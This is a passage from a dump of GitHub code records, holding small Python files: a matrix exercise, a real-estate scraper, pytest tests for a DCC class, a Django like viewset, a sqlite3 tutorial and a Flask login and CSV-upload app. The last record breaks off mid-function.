return\n","repo_name":"Cloudxtreme/paas-5","sub_path":"agent-modules/cloudbot/clcAPI/vmEngine00.py","file_name":"vmEngine00.py","file_ext":"py","file_size_in_byte":10433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
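Several functions in the record above lazily create `threading.Lock` objects in `vmConfigEngine.g_user_thread_lock` (the `import threading` they rely on was missing and has been added to the record's imports). The check-then-create step is itself unguarded; a sketch of one way to make creation safe, with hypothetical names, not the project's actual API:

```python
import threading

_registry_lock = threading.Lock()
g_user_thread_lock = {}

def lock_for(user):
    """Return the per-user lock, creating it under a guard if missing."""
    with _registry_lock:
        if user not in g_user_thread_lock:
            g_user_thread_lock[user] = threading.Lock()
    return g_user_thread_lock[user]

# Usage mirrors the acquire/release pairs in the record:
# with lock_for(userName):
#     clientDataList[userName]['remote'].remove(clientInfo)
```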
+{"seq_id":"37888576472","text":"def transform_matrix(A):\n \"\"\"\n Write an algorithm such that if an element in an MxN matrix is 0, its entire row and column is set 0.\n \"\"\"\n rows = len(A)\n cols = len(A[0])\n\n # an important pattern that I have not implemented here is the count-set;\n # have an array with index 1 if the value is postive or 0 if negative\n\n zero_rows = set()\n zero_cols = set()\n\n for i in range(rows):\n for j in range(cols):\n if A[i][j] == 0:\n zero_rows.add(i)\n zero_cols.add(j)\n \n for i in range(rows):\n if i in zero_rows:\n A[i] = [0] * cols\n else:\n for j in zero_cols:\n A[i][j] = 0\n","repo_name":"elliott-beach/problems","sub_path":"matrices/operate_on_cols.py","file_name":"operate_on_cols.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71684538459","text":"import asyncio\nfrom typing import List\n\nfrom app.common import SkipListing\nfrom app.scrapers.base import BaseScraper\n\n\nclass MaartenScraper(BaseScraper):\n\n MAKELAARDIJ: str = \"maarten\"\n BASE_URL: str = \"https://www.maartenmakelaardij.nl\"\n\n # Specific functions\n async def extract_object_urls(self, soup) -> List[str]:\n \"\"\"\n Extract apartment object urls\n \"\"\"\n items = soup.find_all(\"a\")\n urls: List[str] = []\n for item in items:\n if \"woning/rotterdam-\" in item[\"href\"]:\n urls.append(item[\"href\"])\n\n return list(set(urls))\n\n async def get_page_url(self, page_num: int) -> str:\n \"\"\"\n Format page url\n \"\"\"\n return f\"{self.BASE_URL}/aanbod/rotterdam/\"\n\n async def get_apartment_urls(self) -> List[str]:\n \"\"\"\n Fetch list of apartment urls from inventory\n \"\"\"\n urls = await self.scrape_page(0)\n return urls\n\n def extract_features(self, soup):\n \"\"\"\n Extract feature metadata from listing\n \"\"\"\n meta_data = {\n \"makelaardij\": self.MAKELAARDIJ,\n \"building\": {},\n \"unit\": {\"energy\": {}, \"tags\": []},\n }\n\n dt = soup.find_all(\"dt\")\n dd = soup.find_all(\"dd\")\n\n # Features\n for ind, key in enumerate(dt):\n\n if \"Bouwjaar\" in key.string:\n meta_data[\"building\"][\"year_constructed\"] = self.find_int(\n dd[ind].string\n )\n\n elif \"Woonoppervlakte\" in key.string:\n meta_data[\"unit\"][\"area\"] = self.find_float(dd[ind].text.split(\" \")[0])\n\n elif \"Aantal kamers\" in key.string:\n meta_data[\"unit\"][\"num_rooms\"] = self.find_int(dd[ind].text)\n\n elif \"verdiepingen\" in key.string:\n meta_data[\"unit\"][\"num_floors\"] = self.find_int(dd[ind].text)\n\n elif \"Status\" in key.string:\n meta_data[\"available\"] = \"Beschikbaar\" in dd[ind].text\n\n elif \"Buitenruimte\" in key.string and \"TUIN\" in dd[ind].text:\n meta_data[\"unit\"][\"tags\"].append(\"garden\")\n\n # Other fields\n meta_data[\"address\"] = soup.find(\"span\", {\"class\": \"adres\"}).string\n meta_data[\"asking_price\"] = self.find_int(\n soup.find(\"span\", {\"class\": \"price\"}).string.replace(\".\", \"\")\n )\n\n description = soup.find(\"div\", {\"id\": \"read-more-content\"}).children\n for p in description:\n p_text = str(p.text)\n if \"Eigen grond\" in p_text:\n meta_data[\"unit\"][\"own_land\"] = True\n elif \"erfpacht\" in p_text:\n meta_data[\"unit\"][\"own_land\"] = False\n\n if \"Energielabel\" in p_text:\n label = p_text.split(\"Energielabel: \")[1][0]\n meta_data[\"unit\"][\"energy\"][\"label\"] = label\n\n break\n\n # Bounce broken listings\n if not meta_data[\"unit\"].get(\"area\"):\n raise SkipListing(\"Unable to find area\")\n\n return meta_data\n\n\nif __name__ == \"__main__\":\n scraper = MaartenScraper()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(scraper.start())\n","repo_name":"damienallen/makelaardij-notify","sub_path":"server/app/scrapers/maarten.py","file_name":"maarten.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29755789236","text":"def FillBoard(n, point_x, point_y, x, y):\r\n global c\r\n if n == 2:\r\n for i in range(2):\r\n for j in range(2):\r\n if (x + i != point_x) or (y + j != point_y):\r\n Board[x + i][y + j] = int(c / 3)\r\n c += 1\r\n return\r\n else:\r\n for i in range(2):\r\n for j in range(2):\r\n if (x + i * n / 2 > point_x) or (point_x >= x + i * n / 2 + n / 2) or (y + j * n / 2 > point_y) or (point_y >= y + j * n / 2 + n / 2):\r\n Board[x + int(n / 2) - 1 + i][y + int(n / 2) - 1 + j] = c / 3\r\n c += 1\r\n\r\n for i in range(2):\r\n for j in range(2):\r\n if (x + i * n / 2 <= point_x) and (point_x < x + i * n / 2 + n / 2) and (y + j * n / 2 <= point_y) and (point_y < y + j * n / 2 + n / 2):\r\n FillBoard(int(n / 2), point_x, point_y, x + i * int(n / 2), y + j * int(n / 2))\r\n else:\r\n FillBoard(int(n / 2), x + int(n / 2) - 1 + i, y + int(n / 2) - 1 + j, x + i * int(n / 2), y + j * int(n / 2))\r\n\r\n\r\nn = int(input())\r\nn = 2 ** n\r\nc = 3\r\nBoard = [[0] * n for i in range(n)]\r\npoint_x, point_y = map(int, input().split())\r\nFillBoard(n, 0, 0, point_x - 1, point_y - 1)\r\nfor i in range(n):\r\n for j in range(n):\r\n print(int(Board[i][j]), end=' ')\r\n print()","repo_name":"1mm0rTaLzzz/OOP","sub_path":"1401.py","file_name":"1401.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72825181661","text":"from typing import List, Optional\n\nfrom django.conf import settings\nfrom typing_extensions import TypedDict\nfrom vk_api import VkApi\n\n\nclass ErrorResponse(TypedDict):\n code: int\n description: str\n\n\nclass ApiResponse(TypedDict):\n user_id: int\n status: bool\n error: Optional[ErrorResponse]\n\n\nclass NotificationsUtils:\n @staticmethod\n def send_notification(\n user_ids: List[int], message: str, fragment: str\n ) -> List[ApiResponse]:\n user_ids_str = \",\".join(str(user_id) for user_id in user_ids)\n api = VkApi(\n token=settings.VK_SERVICE_TOKEN,\n api_version=settings.VK_API_VERSION,\n ).get_api()\n return api.notifications.sendMessage(\n user_ids=user_ids_str, message=message, fragment=fragment\n )\n","repo_name":"dimadk24/english-fight","sub_path":"backend/game/notifications_utils.py","file_name":"notifications_utils.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70468015260","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for ExternalDCC class.\"\"\"\n\nimport shutil\nimport tempfile\nimport os\n\nimport pytest\nfrom stalker import (\n Version,\n Task,\n Project,\n Structure,\n StatusList,\n Repository,\n Status,\n FilenameTemplate,\n)\n\nfrom anima.dcc.external import ExternalDCC, ExternalDCCFactory\n\n\n@pytest.fixture(scope=\"function\")\ndef test_data(create_test_db):\n \"\"\"Set up the test data.\"\"\"\n data = dict()\n data[\"temp_path\"] = tempfile.mkdtemp()\n data[\"repo\"] = Repository(\n name=\"Test Repository\",\n code=\"TR\",\n linux_path=data[\"temp_path\"],\n windows_path=data[\"temp_path\"],\n osx_path=data[\"temp_path\"],\n )\n data[\"status_new\"] = Status.query.filter_by(code=\"NEW\").first()\n data[\"status_wip\"] = Status.query.filter_by(code=\"WIP\").first()\n data[\"status_cmpl\"] = Status.query.filter_by(code=\"CMPL\").first()\n\n data[\"project_status_list\"] = StatusList.query.filter_by(\n target_entity_type=\"Project\"\n ).first()\n data[\"task_filename_template\"] = FilenameTemplate(\n name=\"Task Filename Template\",\n target_entity_type=\"Task\",\n path=\"{{project.code}}/{%- for parent_task in parent_tasks -%}\"\n \"{{parent_task.nice_name}}/{%- endfor -%}\",\n filename=\"{{version.nice_name}}\"\n '_v{{\"%03d\"|format(version.version_number)}}{{extension}}',\n )\n data[\"project_structure\"] = Structure(\n name=\"Project Structure\", templates=[data[\"task_filename_template\"]]\n )\n data[\"project\"] = Project(\n name=\"Test Project\",\n code=\"TP\",\n status_list=data[\"project_status_list\"],\n repository=data[\"repo\"],\n structure=data[\"project_structure\"],\n )\n\n data[\"task\"] = Task(name=\"Test Task\", project=data[\"project\"])\n from stalker.db.session import DBSession\n\n DBSession.add(data[\"task\"])\n DBSession.commit()\n\n data[\"version\"] = Version(task=data[\"task\"])\n\n data[\"kwargs\"] = {\n \"name\": \"Photoshop\",\n \"extensions\": [\"psd\"],\n \"structure\": [\"Outputs\"],\n }\n\n data[\"external_env\"] = ExternalDCC(**data[\"kwargs\"])\n\n yield data\n\n # clean up the test\n shutil.rmtree(data[\"temp_path\"])\n\n\ndef test_name_argument_cannot_be_skipped(test_data):\n \"\"\"testing if a TypeError will raise when the name argument is skipped\"\"\"\n test_data[\"kwargs\"].pop(\"name\")\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_name_argument_cannot_be_None(test_data):\n \"\"\"testing if a TypeError will be raised when the name argument is None\"\"\"\n test_data[\"kwargs\"][\"name\"] = None\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_name_attribute_cannot_be_set_to_None(test_data):\n \"\"\"testing if a TypeError will be raised when the name attribute is set\n to None\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"name\", None)\n\n\ndef test_name_argument_should_be_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the name argument is not\n a string\n \"\"\"\n test_data[\"kwargs\"][\"name\"] = 32\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_name_attribute_should_be_set_to_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the name attribute is set\n to a value other than a string\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"name\", 23)\n\n\ndef test_name_argument_is_working_properly(test_data):\n \"\"\"testing if the name argument value is correctly passed to the name\n attribute\n 
\"\"\"\n test_value = \"ZBrush\"\n test_data[\"kwargs\"][\"name\"] = test_value\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert test_value == external_env.name\n\n\ndef test_name_attribute_is_working_properly(test_data):\n \"\"\"testing if the name attribute value is correctly set\"\"\"\n test_value = \"ZBrush\"\n test_data[\"external_env\"].name = test_value\n assert test_value == test_data[\"external_env\"].name\n\n\ndef test_extension_argument_cannot_be_skipped(test_data):\n \"\"\"testing if a TypeError will raised when the extension argument is\n skipped\n \"\"\"\n test_data[\"kwargs\"].pop(\"extensions\")\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_extension_argument_cannot_be_None(test_data):\n \"\"\"testing if a TypeError will be raised when the extension argument is\n None\n \"\"\"\n test_data[\"kwargs\"][\"extensions\"] = None\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_extension_attribute_cannot_be_set_to_None(test_data):\n \"\"\"testing if a TypeError will be raised when the extension attribute\n is set to None\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"extensions\", None)\n\n\ndef test_extension_argument_should_be_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the extension argument is\n not a string\n \"\"\"\n test_data[\"kwargs\"][\"extensions\"] = 32\n pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_extension_attribute_should_be_set_to_a_string(test_data):\n \"\"\"testing if a TypeError will be raised when the extension attribute\n is set to a value other than a string\n \"\"\"\n pytest.raises(TypeError, setattr, test_data[\"external_env\"], \"extensions\", 23)\n\n\ndef test_extension_argument_with_no_dots_is_working(test_data):\n \"\"\"testing if extension argument accepts strings without a dot at the\n beginning\n \"\"\"\n test_data[\"kwargs\"][\"extensions\"] = [\"psd\"]\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert [\".psd\"] == external_env.extensions\n\n\ndef test_extension_attribute_with_no_dots_is_working(test_data):\n \"\"\"testing if extension attribute accepts strings without a dot at the\n beginning\n \"\"\"\n test_data[\"external_env\"].extensions = [\"psd\"]\n assert [\".psd\"] == test_data[\"external_env\"].extensions\n\n\ndef test_extension_argument_is_working_properly(test_data):\n \"\"\"testing if the extension argument value is correctly passed to the\n extension attribute\n \"\"\"\n test_value = [\".ztl\"]\n test_data[\"kwargs\"][\"extensions\"] = test_value\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert test_value == external_env.extensions\n\n\ndef test_extension_attribute_is_working_properly(test_data):\n \"\"\"testing if the extension attribute value is correctly set\"\"\"\n test_value = [\".ztl\"]\n test_data[\"external_env\"].extensions = test_value\n assert test_value == test_data[\"external_env\"].extensions\n\n\ndef test_structure_argument_can_be_skipped(test_data):\n \"\"\"testing if the structure argument can be skipped\"\"\"\n test_data[\"kwargs\"].pop(\"structure\")\n ExternalDCC(**test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_value_when_structure_argument_is_skipped(test_data):\n \"\"\"testing if the structure argument attribute will be an empty list\n when the structure argument is skipped\n \"\"\"\n test_data[\"kwargs\"].pop(\"structure\")\n external_env = ExternalDCC(**test_data[\"kwargs\"])\n assert external_env.structure == 
[]\n\n\ndef test_structure_argument_can_be_set_to_None(test_data):\n    \"\"\"testing if the structure argument can be set to None\"\"\"\n    test_data[\"kwargs\"][\"structure\"] = None\n    ExternalDCC(**test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_value_when_structure_argument_is_None(test_data):\n    \"\"\"testing if the structure attribute will be an empty list\n    when the structure argument value is None\n    \"\"\"\n    test_data[\"kwargs\"][\"structure\"] = None\n    external_env = ExternalDCC(**test_data[\"kwargs\"])\n    assert external_env.structure == []\n\n\ndef test_structure_attribute_can_be_set_to_None(test_data):\n    \"\"\"testing if the structure attribute value will be an empty list when\n    the structure attribute is set to None\n    \"\"\"\n    test_data[\"external_env\"].structure = None\n\n\ndef test_structure_argument_is_not_a_list(test_data):\n    \"\"\"testing if a TypeError will be raised when the structure argument\n    is not None or a list\n    \"\"\"\n    test_data[\"kwargs\"][\"structure\"] = \"this is not a list\"\n    pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_is_not_a_list(test_data):\n    \"\"\"testing if a TypeError will be raised when the structure attribute\n    is not set to None or a list\n    \"\"\"\n    pytest.raises(\n        TypeError, setattr, test_data[\"external_env\"], \"structure\", \"this is not a list\"\n    )\n\n\ndef test_structure_argument_is_not_a_list_of_strings(test_data):\n    \"\"\"testing if a TypeError will be raised when not all the elements\n    are strings in structure argument\n    \"\"\"\n    test_data[\"kwargs\"][\"structure\"] = [\"not\", 1, \"list of\", \"strings\"]\n    pytest.raises(TypeError, ExternalDCC, **test_data[\"kwargs\"])\n\n\ndef test_structure_attribute_is_not_a_list_of_strings(test_data):\n    \"\"\"testing if a TypeError will be raised when not all the elements\n    are strings in structure attribute value\n    \"\"\"\n    test_value = [\"not\", 1, \"list of\", \"strings\"]\n    pytest.raises(\n        TypeError, setattr, test_data[\"external_env\"], \"structure\", test_value\n    )\n\n\ndef test_structure_argument_is_working_properly(test_data):\n    \"\"\"testing if the structure argument value is correctly passed to the\n    structure attribute\n    \"\"\"\n    test_value = [\"Outputs\", \"Inputs\", \"cache\"]\n    test_data[\"kwargs\"][\"structure\"] = test_value\n    external_env = ExternalDCC(**test_data[\"kwargs\"])\n    assert sorted(test_value) == sorted(external_env.structure)\n\n\ndef test_structure_attribute_is_working_properly(test_data):\n    \"\"\"testing if the structure attribute value can be correctly updated\"\"\"\n    test_value = [\"Outputs\", \"Inputs\", \"cache\"]\n    test_data[\"external_env\"].structure = test_value\n    assert sorted(test_value) == sorted(test_data[\"external_env\"].structure)\n\n\ndef test_conform_version_argument_accepts_Version_instances_only(test_data):\n    \"\"\"testing if a TypeError will be raised when the version argument in\n    conform method is not a Version instance\n    \"\"\"\n    pytest.raises(\n        TypeError, test_data[\"external_env\"].conform, version=\"not a version instance\"\n    )\n\n\ndef test_conform_method_will_set_the_version_extension(test_data):\n    \"\"\"testing if the conform method will set the version extension to the\n    DCC extension correctly\n    \"\"\"\n    assert test_data[\"version\"].extension != \".ztl\"\n    external_env = ExternalDCC(name=\"ZBrush\", extensions=[\".ztl\"])\n\n    external_env.conform(test_data[\"version\"])\n    assert test_data[\"version\"].extension == \".ztl\"\n\n\ndef 
test_conform_method_will_set_the_version_created_with(test_data):\n    \"\"\"testing if the conform method will set the version created_with to the DCC name\"\"\"\n    assert test_data[\"version\"].extension != \".ztl\"\n    external_env = ExternalDCC(name=\"ZBrush\", extensions=[\".ztl\"])\n    external_env.conform(test_data[\"version\"])\n    assert test_data[\"version\"].extension == \".ztl\"\n    assert test_data[\"version\"].created_with == \"ZBrush\"\n\n\ndef test_initialize_structure_version_argument_accepts_Version_instances_only(\n    test_data,\n):\n    \"\"\"testing if a TypeError will be raised when the version argument in\n    initialize_structure method is not a Version instance\n    \"\"\"\n    pytest.raises(\n        TypeError,\n        test_data[\"external_env\"].initialize_structure,\n        version=\"not a version instance\",\n    )\n\n\ndef test_initialize_structure_will_create_the_folders_of_the_environment(test_data):\n    \"\"\"testing if the initialize_structure method will create the folders\n    at the given Version instance path\n    \"\"\"\n    test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n    for folder in test_data[\"external_env\"].structure:\n        assert os.path.exists(os.path.join(test_data[\"version\"].absolute_path, folder))\n\n\ndef test_initialize_structure_will_handle_OSErrors(test_data):\n    \"\"\"testing if the initialize_structure method will handle OSErrors when\n    creating folders which are already there\n    \"\"\"\n    # call it multiple times\n    test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n    test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n    test_data[\"external_env\"].initialize_structure(test_data[\"version\"])\n\n\ndef test_save_as_will_conform_and_initialize_structure(test_data):\n    \"\"\"testing if the save_as method will conform the given version and\n    initialize the structure\n    \"\"\"\n    test_data[\"external_env\"].save_as(test_data[\"version\"])\n    assert test_data[\"external_env\"].extensions[0] == test_data[\"version\"].extension\n    for folder in test_data[\"external_env\"].structure:\n        assert os.path.exists(os.path.join(test_data[\"version\"].absolute_path, folder))\n\n\ndef test_get_settings_file_path_returns_the_settings_path_correctly(test_data):\n    \"\"\"testing if the get_settings_path returns the settings path correctly\"\"\"\n    assert (\n        os.path.expanduser(\"~/.atrc/last_version\")\n        == ExternalDCC.get_settings_file_path()\n    )\n\n\ndef test_append_to_recent_files_version_argument_is_not_a_Version_instance(test_data):\n    \"\"\"testing if a TypeError will be raised when the version argument in\n    append_to_recent_files() method is not a stalker.models.version.Version\n    instance\n    \"\"\"\n    pytest.raises(TypeError, test_data[\"external_env\"].append_to_recent_files, 3121)\n\n\ndef test_append_to_recent_files_working_properly(test_data):\n    \"\"\"testing if the append_to_recent_files() method is working properly\"\"\"\n    # set the id attribute of the test version to a random number\n    test_data[\"version\"].id = 234\n    test_data[\"external_env\"].append_to_recent_files(test_data[\"version\"])\n    # check the settings file\n    path = test_data[\"external_env\"].get_settings_file_path()\n    with open(path, \"r\") as f:\n        vid = f.read()\n    assert vid == str(234)\n\n\ndef test_get_last_version_is_working_properly(test_data):\n    \"\"\"testing if the get_last_version() method will return a Version\n    instance properly\n    \"\"\"\n    from stalker.db.session import DBSession\n\n    DBSession.add(test_data[\"version\"])\n    DBSession.commit()\n    assert test_data[\"version\"].id 
is not None\n test_data[\"external_env\"].append_to_recent_files(test_data[\"version\"])\n last_version = test_data[\"external_env\"].get_last_version()\n assert last_version == test_data[\"version\"]\n\n\ndef test_get_env_names_method_will_return_all_environment_names_properly(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env_names() method will\n return all the DCC names as a list of strings\n \"\"\"\n from anima.dcc.external import external_dccs\n\n expected_result = list(external_dccs.keys())\n ext_env_factory = ExternalDCCFactory()\n result = ext_env_factory.get_env_names()\n assert expected_result == result\n\n\ndef test_get_env_names_method_will_return_complex_environment_names_properly(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env_names() method will\n return all the DCC names as a list of strings in desired format\n when environment_name_format is set\n \"\"\"\n name_format = \"%e - %n\"\n expected_result = [\n \".ztl - ZBrush\",\n \".mud - MudBox\",\n #'.psd - Photoshop'\n ]\n ext_env_factory = ExternalDCCFactory()\n result = ext_env_factory.get_env_names(name_format=name_format)\n assert sorted(expected_result) == sorted(result)\n\n\ndef test_get_env_method_name_argument_is_not_a_string(create_test_db):\n \"\"\"testing if a TypeError will be raised when the name argument is not\n a string in ExternalEnvironmentFactory.get_env() method\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n pytest.raises(TypeError, ext_env_factory.get_env, 234)\n\n\ndef test_get_env_method_name_is_not_in_list(create_test_db):\n \"\"\"testing if a ValueError will be raised when the name argument value\n is not in the anima.dcc.external_environments list\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n pytest.raises(ValueError, ext_env_factory.get_env, \"Modo\")\n\n\ndef test_get_env_method_will_return_desired_environment(create_test_db):\n \"\"\"testing if ExternalDCCFactory.get_env() will return desired\n ExternalEnvironment instance\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n\n zbrush_tool = ext_env_factory.get_env(\"ZBrush\")\n assert isinstance(zbrush_tool, ExternalDCC)\n assert zbrush_tool.name == \"ZBrush\"\n assert zbrush_tool.extensions == [\".ztl\"]\n assert zbrush_tool.structure == [\"Outputs\"]\n\n mudbox = ext_env_factory.get_env(\"MudBox\")\n assert isinstance(mudbox, ExternalDCC)\n assert mudbox.name == \"MudBox\"\n assert mudbox.extensions == [\".mud\"]\n assert mudbox.structure == [\"Outputs\"]\n\n\ndef test_get_env_method_will_return_desired_environment_even_with_complex_formats(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env() will return desired\n ExternalEnvironment instance even with names like \"MudBox (.mud)\"\n \"\"\"\n ext_env_factory = ExternalDCCFactory()\n\n zbrush = ext_env_factory.get_env(\"ZBrush (.ztl)\", name_format=\"%n (%e)\")\n assert isinstance(zbrush, ExternalDCC)\n assert zbrush.name == \"ZBrush\"\n assert zbrush.extensions == [\".ztl\"]\n assert zbrush.structure == [\"Outputs\"]\n\n mudbox = ext_env_factory.get_env(\"MudBox (.mud)\", name_format=\"%n (%e)\")\n assert isinstance(mudbox, ExternalDCC)\n assert mudbox.name == \"MudBox\"\n assert mudbox.extensions == [\".mud\"]\n assert mudbox.structure == [\"Outputs\"]\n\n\ndef test_get_env_method_will_return_desired_environment_even_with_custom_formats(\n create_test_db,\n):\n \"\"\"testing if ExternalDCCFactory.get_env() will return desired\n ExternalEnvironment instance even with names like \"MudBox (.mud)\"\n \"\"\"\n ext_env_factory = 
ExternalDCCFactory()\n name_format = \"(%e) - %n\"\n zbrush = ext_env_factory.get_env(\"(.ztl) - ZBrush\", name_format=name_format)\n assert isinstance(zbrush, ExternalDCC)\n assert zbrush.name == \"ZBrush\"\n assert zbrush.extensions == [\".ztl\"]\n assert zbrush.structure == [\"Outputs\"]\n\n mudbox = ext_env_factory.get_env(\"(.mud) - MudBox\", name_format=name_format)\n assert isinstance(mudbox, ExternalDCC)\n assert mudbox.name == \"MudBox\"\n assert mudbox.extensions == [\".mud\"]\n assert mudbox.structure == [\"Outputs\"]\n","repo_name":"eoyilmaz/anima","sub_path":"tests/dcc/test_external.py","file_name":"test_external.py","file_ext":"py","file_size_in_byte":18175,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"69"}
+{"seq_id":"2084883687","text":"from posts.models import Post\nfrom likes.permissions import hasSelfVotedOrReadOnly\nfrom django.shortcuts import get_object_or_404, render\nfrom rest_framework import serializers, viewsets,status,permissions\nfrom . models import Like\nfrom . serializers import LikeSerializer\n\n\n# Create your views here.\nclass LikeViewSet(viewsets.ModelViewSet):\n queryset=Like.objects.all()\n serializer_class=LikeSerializer\n permission_classes=[permissions.IsAuthenticatedOrReadOnly,hasSelfVotedOrReadOnly]\n def perform_create(self, serializer):\n post_instance=get_object_or_404(Post,pk=self.request.data['post'])\n\n #if user likes the post\n if self.request.data['like']:\n already_liked=Like.objects.filter(post=post_instance,like=self.request.user).exists()\n if already_liked:\n raise serializers.ValidationError({\"message\":\"You have already liked this post\"})\n else:\n serializer.save(like=self.request.user,post=post_instance)\n #if dislikes\n else:\n already_disliked=Like.objects.filter(post=post_instance,unlike=self.request.user).exists()\n if already_disliked:\n raise serializers.ValidationError({\"message\":\"You have already disliked this post\"})\n else:\n serializer.save(unlike=self.request.user,post=post_instance)\n \n","repo_name":"eddyvk01/social-api","sub_path":"likes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"12351712544","text":"'''\nsqlite3\n - 내장형 DBMS : 기기 내부에서만 사용\n - 외부 접근 허용 안됨\n'''\n\nimport sqlite3\n\nprint(sqlite3.version_info) # (2, 6, 0) : 나오면 제대로 실행된다는 뜻.\nprint(sqlite3.sqlite_version_info) # (3, 31, 1)\n\ntry :\n # 1. database 생성 & db 연동 객체\n conn = sqlite3.connect(\"./chap09_Database/data/sqlite.db\") # sqlite.db 생성\n # sql문 실행 객체\n cursor = conn.cursor()\n\n # 2. table 생성\n sql = \"\"\"create table if not exists test_tab(\n name text(10),\n phone text(15),\n addr text(50) )\"\"\"\n cursor.execute(sql) # table 생성\n\n # 3. 테이블에 레코드 추가 # 쌍따옴표!!\n '''\n cursor.execute(\"insert into test_tab values('홍길동', '010-111-1111', '서울시')\")\n cursor.execute(\"insert into test_tab values('이순신', '010-111-1111', '해남시')\")\n cursor.execute(\"insert into test_tab values('유관순', '010-111-1111', '충남시')\")\n conn.commit() # db 반영, table 생성단계는 auto commit\n '''\n\n # 4. 레코드 조회 : commit의 대상이 아님. commit은 데이타베이스의 구조를 변화시킬 때에만.\n cursor.execute(\"select * from test_tab\")\n dataset = cursor.fetchall() # 객체에 저장된 레코드를 -> fetchall 사용하여 레코드 가져오기\n for row in dataset :\n print(row)\n\n print('='*35)\n print('이름\\t\\t전화번호\\t\\t주소')\n print('=' * 35)\n for row in dataset :\n print(row[0] + '\\t' + row[1] + '\\t' + row[2])\n print('=' * 35)\n\nexcept Exception as e:\n print('db 연동 오류 :', e)\n conn.rollback() # 이전 쿼리 실행을 취소\nfinally :\n cursor.close()\n conn.close()\n\n# ('홍길동', '010-111-1111', '서울시')\n# ('이순신', '010-111-1111', '해남시')\n# ('유관순', '010-111-1111', '충남시')\n# ===================================\n# 이름\t\t전화번호\t\t주소\n# ===================================\n# 홍길동\t010-111-1111\t서울시\n# 이순신\t010-111-1111\t해남시\n# 유관순\t010-111-1111\t충남시\n# ===================================\n\n","repo_name":"ssmmchoi/python1","sub_path":"workspace/chap09_Database/lecture01_sqlite/step01_sqlite_test.py","file_name":"step01_sqlite_test.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27925413653","text":"from flask import Flask, render_template, \\\n request, jsonify, send_file, session\nfrom db.dataBase import checkUser, execute_once\nimport os\nimport base64\nimport pandas as pd\n#from werkzeug import secure_filename\nfrom werkzeug.utils import secure_filename\nfrom main import main\n\napp = Flask(__name__)\napp.secret_key = \"my super secret key\"\n\n@app.route(\"/\")\ndef logIn():\n if 'user' in session:\n user = session['user']\n return render_template('home.html', user=user)\n\n return render_template('LogIn.html')\n\n@app.route('/checkUserLogIn', methods=['GET', 'POST'])\ndef checkUserLogIn():\n msg, status = '', False\n try:\n user = request.form['txtUsername']\n password = request.form['txtPass']\n status = checkUser(username=user, password=password)\n if status:\n session['user'] = user\n msg = 'successfully logged in'\n else:\n session.pop('user', None)\n msg = 'wrong username or password'\n except:\n session.pop('user', None)\n msg, status = 'Internal server error', False\n\n if status:\n return render_template('home.html', user=user)\n\n return jsonify({'status': status, 'msg': msg})\n\ndef remove_old_files(file=None):\n try:\n if file is not None:\n if os.path.exists(file):\n os.remove(file)\n print(file + ' removed')\n else:\n print(file + \" does not exist\")\n except:\n print('treat the error here')\n\n@app.route('/upload_document', methods=['POST', 'GET'])\ndef upload_document():\n if 'user' not in session:\n return\n status, msg, encoded_img, csv_table = False, \"\", \"\", \"\"\n if 'files' not in request.files:\n msg, status = 'No files', False\n return jsonify({'msg': msg, 'status': status})\n\n files = request.files.getlist('files')\n csv = files[0]\n\n filename = secure_filename(csv.filename) # make it safe\n if '.' not in filename or filename.rsplit('.', 1)[1].lower() != 'csv':\n msg, status = 'Not a csv file', False\n return jsonify({'msg': msg, 'status': status})\n\n save_folder = './save_folder'\n try:\n csv.save(os.path.join(save_folder, filename))\n\n main(os.path.join(save_folder, filename))\n\n img_name = './output.png'\n with open(img_name, \"rb\") as image_file:\n encoded_img = base64.b64encode(image_file.read())\n\n table = pd.read_csv(\"./output.csv\")\n csv_table = table.to_html()\n\n msg, status = 